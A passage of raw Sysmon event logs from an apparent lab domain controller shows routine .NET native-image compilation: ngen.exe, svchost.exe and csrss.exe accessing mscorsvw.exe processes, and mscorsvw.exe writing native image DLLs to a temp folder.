TEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.642{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45DA-6000-D702-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.642{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45DA-6000-D702-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.548{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45DA-6000-D602-000000009A01}5024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.532{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45DA-6000-D602-000000009A01}5024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.532{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45DA-6000-D602-000000009A01}5024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:38.486{08A6967A-45DA-6000-D502-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b0c-0\System.Web.Routing.dll2021-01-14 13:23:38.486 10341000x80000000000000006998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.470{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45DA-6000-D502-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.454{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45DA-6000-D502-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.454{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45DA-6000-D502-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.298{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45DA-6000-D402-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.298{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45DA-6000-D402-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.298{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45DA-6000-D402-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:38.236{08A6967A-45D9-6000-D302-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f50-0\System.Web.RegularExpressions.dll2021-01-14 13:23:38.236 10341000x80000000000000006991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.001{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D9-6000-D302-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:39.908{08A6967A-45DA-6000-D702-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1330-0\System.Windows.Controls.Ribbon.dll2021-01-14 13:23:39.908 10341000x80000000000000007012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:40.236{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45DC-6000-D902-000000009A01}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:40.236{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45DC-6000-D902-000000009A01}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:40.236{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45DC-6000-D902-000000009A01}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:40.048{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45DC-6000-D802-000000009A01}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:40.017{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45DC-6000-D802-000000009A01}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:40.017{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45DC-6000-D802-000000009A01}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:43.955{08A6967A-45DF-6000-DB02-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bd4-0\System.Windows.Forms.DataVisualization.Design.dll2021-01-14 13:23:43.955 10341000x80000000000000007019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:43.705{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45DF-6000-DB02-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:43.705{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45DF-6000-DB02-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:43.705{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45DF-6000-DB02-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:43.564{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45DF-6000-DA02-000000009A01}2944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:43.548{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45DF-6000-DA02-000000009A01}2944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:43.548{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45DF-6000-DA02-000000009A01}2944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:43.408{08A6967A-45DC-6000-D902-000000009A01}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ed4-0\System.Windows.Forms.DataVisualization.dll2021-01-14 13:23:43.408 